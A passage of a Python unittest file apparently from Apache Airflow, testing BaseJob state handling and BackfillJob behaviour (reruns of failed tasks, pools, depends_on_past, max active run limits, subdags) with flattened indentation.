from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
DEV_NULL = '/dev/null'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TRY_NUMBER = 1
# Include the words "airflow" and "dag" in the file contents,
# tricking airflow into thinking these
# files contain a DAG (otherwise Airflow will skip them)
PARSEABLE_DAG_FILE_CONTENTS = '"airflow DAG"'
UNPARSEABLE_DAG_FILE_CONTENTS = 'airflow DAG'
# Filename to be used for dags that are created in an ad-hoc manner and can be removed/
# created at runtime
TEMP_DAG_FILENAME = "temp_dag.py"
TEST_DAGS_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
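# Minimal sketch (not part of the upstream test suite; the helper name is invented here) of how the
# constants above are typically used: tests that need an ad-hoc DAG drop PARSEABLE_DAG_FILE_CONTENTS
# into a temporary dags folder under TEMP_DAG_FILENAME so file discovery picks it up, or
# UNPARSEABLE_DAG_FILE_CONTENTS to provoke an import error instead.
def _write_temp_dag_file(dags_folder, contents=PARSEABLE_DAG_FILE_CONTENTS):
    # Write `contents` into <dags_folder>/TEMP_DAG_FILENAME and return the full path.
    path = os.path.join(dags_folder, TEMP_DAG_FILENAME)
    with open(path, 'w') as dag_file:
        dag_file.write(contents)
    return path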
class BaseJobTest(unittest.TestCase):
class TestJob(BaseJob):
__mapper_args__ = {
'polymorphic_identity': 'TestJob'
}
def __init__(self, cb):
self.cb = cb
super(BaseJobTest.TestJob, self).__init__()
def _execute(self):
return self.cb()
def test_state_success(self):
job = self.TestJob(lambda: True)
job.run()
self.assertEqual(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_sysexit(self):
import sys
job = self.TestJob(lambda: sys.exit(0))
job.run()
self.assertEqual(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_failed(self):
def abort():
raise RuntimeError("fail")
job = self.TestJob(abort)
with self.assertRaises(RuntimeError):
job.run()
self.assertEqual(job.state, State.FAILED)
self.assertIsNotNone(job.end_date)
class BackfillJobTest(unittest.TestCase):
def setUp(self):
with create_session() as session:
session.query(models.DagRun).delete()
session.query(models.Pool).delete()
session.query(models.TaskInstance).delete()
self.parser = cli.CLIFactory.get_parser()
self.dagbag = DagBag(include_examples=True)
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_trigger_controller_dag(self):
dag = self.dagbag.get_dag('example_trigger_controller_dag')
target_dag = self.dagbag.get_dag('example_trigger_target_dag')
dag.clear()
target_dag.clear()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertFalse(queue.append.called)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True
)
job.run()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertTrue(queue.append.called)
target_dag.clear()
dag.clear()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_multi_dates(self):
dag = self.dagbag.get_dag('example_bash_operator')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
ignore_first_depends_on_past=True
)
job.run()
session = settings.Session()
drs = session.query(DagRun).filter(
DagRun.dag_id == 'example_bash_operator'
).order_by(DagRun.execution_date).all()
self.assertTrue(drs[0].execution_date == DEFAULT_DATE)
self.assertTrue(drs[0].state == State.SUCCESS)
self.assertTrue(drs[1].execution_date ==
DEFAULT_DATE + datetime.timedelta(days=1))
self.assertTrue(drs[1].state == State.SUCCESS)
dag.clear()
session.close()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_examples(self):
"""
Test backfilling example dags
Try to backfill some of the example dags. Be careful, not all dags are suitable
for doing this. For example, a dag that sleeps forever, or does not have a
schedule won't work here since you simply can't backfill them.
"""
include_dags = {
'example_branch_operator',
'example_bash_operator',
'example_skip_dag',
'latest_only'
}
dags = [
dag for dag in self.dagbag.dags.values()
if 'example_dags' in dag.full_filepath and dag.dag_id in include_dags
]
for dag in dags:
dag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# Make sure that we have the dags that we want to test available
# in the example_dags folder, if this assertion fails, one of the
# dags in the include_dags array isn't available anymore
self.assertEqual(len(include_dags), len(dags))
for i, dag in enumerate(sorted(dags, key=lambda d: d.dag_id)):
logger.info('*** Running example DAG #{}: {}'.format(i, dag.dag_id))
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True)
job.run()
def test_backfill_conf(self):
dag = DAG(
dag_id='test_backfill_conf',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='op',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
conf = json.loads("""{"key": "value"}""")
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
conf=conf)
job.run()
dr = DagRun.find(dag_id='test_backfill_conf')
self.assertEqual(conf, dr[0].conf)
def test_backfill_run_rescheduled(self):
dag = DAG(
dag_id='test_backfill_run_rescheduled',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_run_rescheduled_task-1',
dag=dag,
)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UP_FOR_RESCHEDULE)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_upstream_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_upstream_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
t1 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-1',
dag=dag)
t2 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-2',
dag=dag)
t1.set_upstream(t2)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UPSTREAM_FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks_without_flag(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=False
)
with self.assertRaises(AirflowException):
job.run()
def test_backfill_ordered_concurrent_execute(self):
dag = DAG(
dag_id='test_backfill_ordered_concurrent_execute',
start_date=DEFAULT_DATE,
schedule_interval="@daily")
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
# test executor history keeps a list
history = executor.history
# check if right order. Every loop has a 'pause' (0) to change state
# from RUNNING to SUCCESS.
# 6,0,3,0,3,0,3,0 = 8 loops
self.assertEqual(8, len(history))
loop_count = 0
while len(history) > 0:
queued_tasks = history.pop(0)
if loop_count == 0:
# first loop should contain 6 tasks (3 days x 2 tasks)
self.assertEqual(6, len(queued_tasks))
if loop_count == 2 or loop_count == 4 or loop_count == 6:
# 3 days x 1 task
self.assertEqual(3, len(queued_tasks))
loop_count += 1
def test_backfill_pooled_tasks(self):
"""
Test that queued tasks are executed by BackfillJob
"""
session = settings.Session()
pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
session.add(pool)
session.commit()
dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# run with timeout because this creates an infinite loop if not
# caught
with timeout(seconds=30):
job.run()
ti = TI(
task=dag.get_task('test_backfill_pooled_task'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_depends_on_past(self):
"""
Test that backfill respects ignore_depends_on_past
"""
dag = self.dagbag.get_dag('test_depends_on_past')
dag.clear()
run_date = DEFAULT_DATE + datetime.timedelta(days=5)
# backfill should deadlock
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
BackfillJob(dag=dag, start_date=run_date, end_date=run_date).run)
BackfillJob(
dag=dag,
start_date=run_date,
end_date=run_date,
ignore_first_depends_on_past=True).run()
# ti should have succeeded
ti = TI(dag.tasks[0], run_date)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_run_ignores_all_dependencies(self):
"""
Test that run respects ignore_all_dependencies
"""
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
DEFAULT_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=DEFAULT_DATE)
ti_dependent0.refresh_from_db()
self.assertEqual(ti_dependent0.state, State.FAILED)
task1_id = 'test_run_dependency_task'
args1 = ['run',
'-A',
dag_id,
task1_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args1))
ti_dependency = TI(
task=dag.get_task(task1_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependency.refresh_from_db()
self.assertEqual(ti_dependency.state, State.FAILED)
task2_id = 'test_run_dependent_task'
args2 = ['run',
'-A',
dag_id,
task2_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args2))
ti_dependent = TI(
task=dag.get_task(task2_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependent.refresh_from_db()
self.assertEqual(ti_dependent.state, State.SUCCESS)
def test_run_naive_taskinstance(self):
"""
Test that we can run naive (non-localized) task instances
"""
NAIVE_DATE = datetime.datetime(2016, 1, 1)
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
NAIVE_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=NAIVE_DATE)
ti_dependent0.refresh_from_db()
self.assertEqual(ti_dependent0.state, State.FAILED)
def test_cli_backfill_depends_on_past(self):
"""
Test that CLI respects -I argument
"""
dag_id = 'test_dagrun_states_deadlock'
run_date = DEFAULT_DATE + datetime.timedelta(days=1)
args = [
'backfill',
dag_id,
'-l',
'-s',
run_date.isoformat(),
]
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
cli.backfill,
self.parser.parse_args(args))
cli.backfill(self.parser.parse_args(args + ['-I']))
ti = TI(dag.get_task('test_depends_on_past'), run_date)
ti.refresh_from_db()
# task ran
self.assertEqual(ti.state, State.SUCCESS)
dag.clear()
def test_cli_backfill_depends_on_past_backwards(self):
"""
Test that CLI respects -B argument and raises on interaction with depends_on_past
"""
dag_id = 'test_depends_on_past'
start_date = DEFAULT_DATE + datetime.timedelta(days=1)
end_date = start_date + datetime.timedelta(days=1)
args = [
'backfill',
dag_id,
'-l',
'-s',
start_date.isoformat(),
'-e',
end_date.isoformat(),
'-I'
]
dag = self.dagbag.get_dag(dag_id)
dag.clear()
cli.backfill(self.parser.parse_args(args + ['-I']))
ti = TI(dag.get_task('test_dop_task'), end_date)
ti.refresh_from_db()
# runs fine forwards
self.assertEqual(ti.state, State.SUCCESS)
# raises backwards
expected_msg = 'You cannot backfill backwards because one or more tasks depend_on_past: {}'.format(
'test_dop_task')
self.assertRaisesRegexp(
AirflowException,
expected_msg,
cli.backfill,
self.parser.parse_args(args + ['-B']))
def test_cli_receives_delay_arg(self):
"""
Tests that the --delay argument is passed correctly to the BackfillJob
"""
dag_id = 'example_bash_operator'
run_date = DEFAULT_DATE
args = [
'backfill',
dag_id,
'-s',
run_date.isoformat(),
'--delay_on_limit',
'0.5',
]
parsed_args = self.parser.parse_args(args)
self.assertEqual(0.5, parsed_args.delay_on_limit)
def _get_dag_test_max_active_limits(self, dag_id, max_active_runs=1):
dag = DAG(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval="@hourly",
max_active_runs=max_active_runs
)
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op1 >> op2 >> op3
op4 >> op3
dag.clear()
return dag
def test_backfill_max_limit_check_within_limit(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_within_limit',
max_active_runs=16)
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
dagruns = DagRun.find(dag_id=dag.dag_id)
self.assertEqual(2, len(dagruns))
self.assertTrue(all([run.state == State.SUCCESS for run in dagruns]))
def test_backfill_max_limit_check(self):
dag_id = 'test_backfill_max_limit_check'
run_id = 'test_dagrun'
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
dag_run_created_cond = threading.Condition()
def run_backfill(cond):
cond.acquire()
try:
dag = self._get_dag_test_max_active_limits(dag_id)
# this session object is different than the one in the main thread
thread_session = settings.Session()
# Existing dagrun that is not within the backfill range
dag.create_dagrun(
run_id=run_id,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
start_date=DEFAULT_DATE,
)
thread_session.commit()
cond.notify()
finally:
cond.release()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
thread_session.close()
backfill_job_thread = threading.Thread(target=run_backfill,
name="run_backfill",
args=(dag_run_created_cond,))
dag_run_created_cond.acquire()
session = settings.Session()
backfill_job_thread.start()
try:
# at this point backfill can't run since the max_active_runs has been
# reached, so it is waiting
dag_run_created_cond.wait(timeout=1.5)
dagruns = DagRun.find(dag_id=dag_id)
dr = dagruns[0]
self.assertEqual(1, len(dagruns))
self.assertEqual(dr.run_id, run_id)
# allow the backfill to execute by setting the existing dag run to SUCCESS,
# backfill will execute dag runs 1 by 1
dr.set_state(State.SUCCESS)
session.merge(dr)
session.commit()
session.close()
backfill_job_thread.join()
dagruns = DagRun.find(dag_id=dag_id)
self.assertEqual(3, len(dagruns)) # 2 from backfill + 1 existing
self.assertEqual(dagruns[-1].run_id, dr.run_id)
finally:
dag_run_created_cond.release()
def test_backfill_max_limit_check_no_count_existing(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_no_count_existing')
start_date = DEFAULT_DATE
end_date = DEFAULT_DATE
# Existing dagrun that is within the backfill range
dag.create_dagrun(run_id="test_existing_backfill",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
# BackfillJob will run since the existing DagRun does not count for the max
# active limit since it's within the backfill date range.
dagruns = DagRun.find(dag_id=dag.dag_id)
# will only be able to run 1 (the existing one) since there's just
# one dag run slot left given the max_active_runs limit
self.assertEqual(1, len(dagruns))
self.assertEqual(State.SUCCESS, dagruns[0].state)
def test_backfill_max_limit_check_complete_loop(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_complete_loop')
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
# Given the max limit to be 1 in active dag runs, we need to run the
# backfill job 3 times
success_expected = 2
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
self.assertEqual(success_expected, success_dagruns)
self.assertEqual(0, running_dagruns) # no dag_runs in running state are left
def test_sub_set_subdag(self):
dag = DAG(
'test_sub_set_subdag',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
sub_dag = dag.sub_dag(task_regex="leave*",
include_downstream=False,
include_upstream=False)
job = BackfillJob(dag=sub_dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
job.run()
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(BackfillJob.ID_FORMAT_PREFIX.format(DEFAULT_DATE.isoformat()),
dr.run_id)
for ti in dr.get_task_instances():
if ti.task_id == 'leave1' or ti.task_id == 'leave2':
self.assertEqual(State.SUCCESS, ti.state)
else:
self.assertEqual(State.NONE, ti.state)
def test_backfill_fill_blanks(self):
dag = DAG(
'test_backfill_fill_blanks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'},
)
with dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2')
op3 = DummyOperator(task_id='op3')
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
op6 = DummyOperator(task_id='op6')
dag.clear()
dr = dag.create_dagrun(run_id='test',
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
session = settings.Session()
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id == op1.task_id:
ti.state = State.UP_FOR_RETRY
ti.end_date = DEFAULT_DATE
elif ti.task_id == op2.task_id:
ti.state = State.FAILED
elif ti.task_id == op3.task_id:
ti.state = State.SKIPPED
elif ti.task_id == op4.task_id:
ti.state = State.SCHEDULED
elif ti.task_id == op5.task_id:
ti.state = State.UPSTREAM_FAILED
# op6 = None
session.merge(ti)
session.commit()
session.close()
job = BackfillJob(dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
self.assertRaisesRegexp(
AirflowException,
'Some task instances failed',
job.run)
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(dr.state, State.FAILED)
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == op2.task_id:
self.assertEqual(ti.state, State.FAILED)
elif ti.task_id == op3.task_id:
self.assertEqual(ti.state, State.SKIPPED)
elif ti.task_id == op5.task_id:
self.assertEqual(ti.state, State.UPSTREAM_FAILED)
def test_backfill_execute_subdag(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
start_date = timezone.utcnow()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=start_date,
end_date=start_date,
executor=executor,
donot_pickle=True)
job.run()
history = executor.history
subdag_history = history[0]
# check that all 5 task instances of the subdag 'section-1' were executed
self.assertEqual(5, len(subdag_history))
for sdh in subdag_history:
ti = sdh[3]
self.assertIn('section-1-task-', ti.task_id)
subdag.clear()
dag.clear()
def test_subdag_clear_parentdag_downstream_clear(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
with timeout(seconds=30):
job.run()
ti0 = TI(
task=subdag.get_task('section-1-task-1'),
execution_date=DEFAULT_DATE)
ti0.refresh_from_db()
self.assertEqual(ti0.state, State.SUCCESS)
sdag = subdag.sub_dag(
task_regex='section-1-task-1',
include_downstream=True,
include_upstream=False)
sdag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
include_parentdag=True)
ti0.refresh_from_db()
self.assertEqual(State.NONE, ti0.state)
ti1 = TI(
task=dag.get_task('some-other-task'),
execution_date=DEFAULT_DATE)
self.assertEqual(State.NONE, ti1.state)
# Checks that all the Downstream tasks for Parent DAG
# have been cleared
for task in subdag_op_task.downstream_list:
ti = TI(
task=dag.get_task(task.task_id),
execution_date=DEFAULT_DATE
)
self.assertEqual(State.NONE, ti.state)
subdag.clear()
dag.clear()
def test_backfill_execute_subdag_with_removed_task(self):
"""
Ensure that subdag operators execute properly in the case where
an associated task of the subdag has been removed from the dag
definition, but has instances in the database from previous runs.
"""
dag = self.dagbag.get_dag('example_subdag_operator')
subdag = dag.get_task('section-1').subdag
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
removed_task_ti = TI(
task=DummyOperator(task_id='removed_task'),
execution_date=DEFAULT_DATE,
state=State.REMOVED)
removed_task_ti.dag_id = subdag.dag_id
session = settings.Session()
session.merge(removed_task_ti)
with timeout(seconds=30):
job.run()
for task in subdag.tasks:
instance = session.query(TI).filter(
TI.dag_id == subdag.dag_id,
TI.task_id == task.task_id,
TI.execution_date == DEFAULT_DATE).first()
self.assertIsNotNone(instance)
self.assertEqual(instance.state, State.SUCCESS)
removed_task_ti.refresh_from_db()
self.assertEqual(removed_task_ti.state, State.REMOVED)
subdag.clear()
dag.clear()
def test_update_counters(self):
dag = DAG(
dag_id='test_manage_executor_state',
start_date=DEFAULT_DATE)
task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
job = BackfillJob(dag=dag)
session = settings.Session()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task1, dr.execution_date)
ti.refresh_from_db()
ti_status = BackfillJob._DagRunTaskStatus()
# test for success
ti.set_state(State.SUCCESS, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 1)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.succeeded.clear()
# test for skipped
ti.set_state(State.SKIPPED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 1)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.skipped.clear()
# test for failed
ti.set_state(State.FAILED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 1)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.failed.clear()
# test for retry
ti.set_state(State.UP_FOR_RETRY, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
# test for reschedule
ti.set_state(State.UP_FOR_RESCHEDULE, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
# test for none
ti.set_state(State.NONE, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
session.close()
def test_dag_get_run_dates(self):
def get_test_dag_for_backfill(schedule_interval=None):
dag = DAG(
dag_id='test_get_dates',
start_date=DEFAULT_DATE,
schedule_interval=schedule_interval)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
)
return dag
test_dag = get_test_dag_for_backfill()
self.assertEqual([DEFAULT_DATE], test_dag.get_run_dates(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE))
test_dag = get_test_dag_for_backfill(schedule_interval="@hourly")
self.assertEqual([DEFAULT_DATE - datetime.timedelta(hours=3),
DEFAULT_DATE - datetime.timedelta(hours=2),
DEFAULT_DATE - datetime.timedelta(hours=1),
DEFAULT_DATE],
test_dag.get_run_dates(
start_date=DEFAULT_DATE - datetime.timedelta(hours=3),
end_date=DEFAULT_DATE,))
def test_backfill_run_backwards(self):
dag = self.dagbag.get_dag("test_start_date_scheduling")
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
run_backwards=True
)
job.run()
session = settings.Session()
        tis = session.query(TI).filter(
            TI.dag_id == 'test_start_date_scheduling',
            TI.task_id == 'dummy'
        ).order_by(TI.execution_date).all()
queued_times = [ti.queued_dttm for ti in tis]
self.assertTrue(queued_times == sorted(queued_times, reverse=True))
self.assertTrue(all([ti.state == State.SUCCESS for ti in tis]))
dag.clear()
session.close()
class LocalTaskJobTest(unittest.TestCase):
def setUp(self):
pass
def test_localtaskjob_essential_attr(self):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
dag = DAG(
'test_localtaskjob_essential_attr',
